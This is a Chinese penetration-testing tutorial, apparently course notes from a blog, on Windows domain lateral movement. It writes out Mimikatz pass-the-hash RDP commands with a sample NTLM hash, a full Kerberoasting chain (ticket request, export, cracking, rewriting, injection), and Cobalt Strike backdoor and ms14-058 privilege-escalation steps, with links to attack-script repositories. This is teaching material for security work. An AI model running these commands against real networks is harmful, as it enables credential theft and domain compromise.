案例1-域横向移动RDP传递-Mimikatz

除了上述讲到的IPC,WMI,SMB等协议的链接外,获取到的明文密码或HASH密文也可以通过RDP协议进行链接操作。

RDP协议连接:判断对方远程桌面服务是否开启(默认:3389),端口扫描判断

当得到密码时,如果对方开启了3389端口,可以直接进行连接并登陆

RDP明文密码链接
1.windows: mstsc
2.mstsc.exe /console /v:192.168.3.21 /admin
3.linux: rdesktop 192.168.3.21:3389RDP密文HASH链接
windows Server需要开启 Restricted Admin mode,在Windows 8.1和Windows Server 2012 R2中默认开启,
同时如果Win 7 和Windows Server 2008 R2安装了2871997、2973351补丁也支持;开启命令:
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f开启后运行:
1.mstsc.exe /restrictedadmin
2.mimikatz.exe
3.privilege::debug
4.sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 "/run:mstsc.exe /restrictedadmin"

案例2-域横向移动SPN服务-探针,请求,导出,破解,重写

1探针
setspn -q */*
setspn -q */* | findstr "MSSQL"2请求票据
# 删除缓存票据
klist purge# powershell请求
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "xxxx"# mimikatz请求
mimikatz.exe "kerberos::ask /target:xxxx"# 查看票据
klist3导出票据
# mimikatz
mimikatz.exe "kerberos::list /export"4破解票据
# 破解工具tgsrepcrack.py python3环境运行
python tgsrepcrack.py passwd.txt xxxx.kirbi
python3 .\tgsrepcrack.py .\password.txt .\1-40a00000-jerry@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi5重写票据
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -u 500
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -g 512
mimikatz.exe kerberos::ptt xxxx.kirbi # 将生成的票据注入内存6利用
dir //xxx.xxx.xxx.xxx/c$

查看域内所有SPN服务列表

查看域内指定的spn服务

案例3-域横向移动测试流程一把梭哈-CobaltStrike初体验

1.关于启动及配置讲解

linux上需配置java环境才可启动

linux上启动后,本地打开bat文件
输入linux的ip以及设置的密码即可连接打开

因为这是一个团队工具,可以多人去连接linux上的CobaltStrike
可以通过配置监听器来区分自己与别人攻击的目标


HTTP Hosts为生成的后门执行后回弹的ip,保存后即对设置的ip进行监听


生成后门

将生成的后门与监听器绑定,当这个后门触发后,绑定的对应监听器就会上线

将后门上传到目标主机并执行,执行后这里显示目标已经上线

进入命令终端

2.关于提权及插件加载

提权

打开后,自带的插件只有两个


可手动导入插件

选择插件目录中的cna文件

选中插件,点击upload加载

重新打开,选择相应的exp进行攻击

选择对应的监听器,攻击成功后进行回弹


点击后,就会用ms14-058对目标主机进行攻击

如果速度过慢的话,这里把sleep设置为1或者0

此时图标上多了一个连接的用户为system,证明已经提权成功
可以打开命令窗口执行命令

3.关于信息收集命令讲解

通过命令net view探针当前的网络环境

可以通过targets查看,查看当前所有探针的信息,非常方便


net dclist获取当前域控主机信息

shell net user /domain
调用cmd去执行net use /domain命令,获取域内所有用户名称

将mimikatz上传后,可直接通过CobaltStrike去执行

执行完后可通过此处直接查看mimikatz收集的信息

对192.168.3.32进行攻击

选择之前通过mimikatz获取的其他主机的口令密码尝试连接
Listener:选择监听器
Session:选择通过哪个主机的权限去连接攻击目标机

4.通过第三方工具

上面通过密码尝试连接时,总不能一个一个密码手动去尝试连接,所以可以借助第三方工具

将第三方工具文件上传到主机


CobaltStrike Aggressor 脚本合集(可以自行在GitHub搜索):

https://github.com/harleyQu1nn/AggressorScripts
https://github.com/Und3rf10w/Aggressor-scripts
https://github.com/001SPARTaN/aggressor_scripts
https://github.com/rasta-mouse/Aggressor-Script
https://github.com/threatexpress/aggressor-scripts
https://github.com/ramen0x3f/AggressorScripts
https://github.com/FortyNorthSecurity/AggressorAssessor
https://github.com/michalkoczwara/aggressor_scripts_collection
https://github.com/ars3n11/Aggressor-Scripts
https://github.com/gaudard/scripts/tree/master/red-team/aggressor
https://github.com/bluscreenofjeff/AggressorScripts
https://github.com/vysecurity/Aggressor-VYSEC
https://github.com/killswitch-GUI/CobaltStrike-ToolKit
https://github.com/rsmudge/ElevateKit (第三方提权攻击)
https://github.com/QAX-A-Team/CobaltStrike-Toolset
https://github.com/DeEpinGh0st/Erebus (Erebus CobaltStrike后渗透测试插件,持续更新)
https://github.com/branthale/CobaltStrikeCNA
https://github.com/pandasec888/taowu-cobalt-strike(仓库已关闭)

内网安全-域横向CobaltStrikeSPNRDP相关推荐

  1. 第69天-内网安全-域横向 CobaltStrikeSPNRDP

    思维导图 知识点 演示案例 域横向移动RDP传递-Mimikatz 除了之前讲到的IPC,WMI,SMB等协议的连接外,获取到的明文密码或HASH密文也可以通过RDP协议进行连接操作. RDP 远程显 ...

  2. p69 内网安全-域横向 CobaltStrikeSPNRDP

    数据来源 SPN(Secret Private Network缩写)_百度百科 (baidu.com) 演示案例 域横向移动RDP传递-Mimikatz 域横向移动SPN服务-探针,请求,导出,破解, ...

  3. 内网安全-域横向批量atschtasksimpacket

    目录 0x01 横向渗透明文传递 1.1 渗透流程 1.2 IPC技术 1.3  [at] & [schtasks] 1.3.1 假设已经找到DC的用户名密码(具体后面再详细讲),由于域控DC ...

  4. p66 内网安全-域横向批量atschtasksimpacket

    数据来源 本文仅用于信息安全的学习,请遵守相关法律法规,严禁用于非法途径.若观众因此作出任何危害网络安全的行为,后果自负,与本人无关. 基本概念 DMZ区域:称为"隔离区",也称' ...

  5. 内网安全 - 域横向 PTHPTKPTT

    域横向 PTH&PTK&PTT 基础知识 域横向移动PTH传递-Mimikatz 域横向移动PTK传递-mimikatz 域横向移动 PTT 传递-MS14068(主要)&ke ...

  6. 内网安全-域横向PTHPTKPTT哈希票据传递

    PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试 PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试 PTK(pass the ke ...

  7. 内网安全-域横向smbwmi明文或hash传递

    知识点1: Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码 Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码 针对以上情况 ...

  8. 内网安全-域横向内网漫游Socks代理隧道技术

    因为是两个局域网 当你用kali生成一个后门文件放到目标主机 设置后门的反弹地址时,设置为你的外网地址时,后们会将信息反弹到你的路由器上 设置为内网地址时,又找不到你 案例 1-内网穿透 Ngrok ...

  9. p71 内网安全-域横向网络传输应用层隧道技术

    数据来源 必备知识点: 1.代理和隧道技术区别? 代理:只是解决网络的访问问题(如:有些内网访问不到,可以用代理实现) 隧道:隧道不仅是解决网络的通信问题,更大的作用是绕过过滤,突破防火墙/入侵检测系 ...

最新文章

  1. 【Socket网络编程】1.bind()和 INADDR_ANY 解析
  2. 我现在的简历以及后面的更改方向
  3. winform在表格中输入一个完整的时间字段_【ArcGIS小技巧视频教程】(5):在ArcGIS中挂接其他数据...
  4. 联想w540笔记本参数_2020年12月笔记本电脑推荐!联想、惠普、华为笔记本电脑推荐!18款高性价比笔记本电脑推荐!!!...
  5. Python time localtime()方法
  6. python绘画音频_人工智能下的音频还能这样玩!!!!
  7. Meidapipe 3D手势姿态跟踪算法,手机端实时检测 ,多个手势同时捕捉
  8. 奇文:金庸小说中的第一高手是谁?
  9. Maven入门实战笔记-11节[7-11]
  10. 详解KubeEdge边缘网络项目EdgeMesh
  11. 深入理解 Java 中的转义符: \u000a\u0022
  12. (八)高德地图之添加marker标记点
  13. Postman 开发团队共享接口协作调试
  14. 2048和多地址入口_王者荣耀2020周年庆返场皮肤投票入口 周年庆皮肤返场投票地址...
  15. Go语言处理Windows系统的图标ICO文件(中)
  16. 整个canvas玩一玩,做一个简单的水印相机小程序
  17. bluehost独立服务器订购注意事项
  18. 普及篇:什么是瀑布模型?
  19. 怎么在线给图片转换格式?分享一款图片转格式神器
  20. 线性代数-矩阵及其运算(总结)

热门文章

  1. 苹果怎么设置下载软件不要密码?手机技巧分享
  2. 瞬时测频接收机matlab_瞬时测频接收机
  3. 第一阶段:Linux基础
  4. android 位置共享_如何与Android的受信任联系人共享您的位置
  5. C# 调用微软自带的语音识别
  6. iPhoneX适配问题 iOS刘海屏 安全区域处理 IOS小黑条处理 IOS兼容处理
  7. 网易云动态小视频下载方法
  8. 城乡规划编制资质很多地区已经开通新办了,那你知道怎么办吗?
  9. 手机号校验规则的正则表达式,包括199及177号段
  10. 常见的手机端头部banner切换代码设置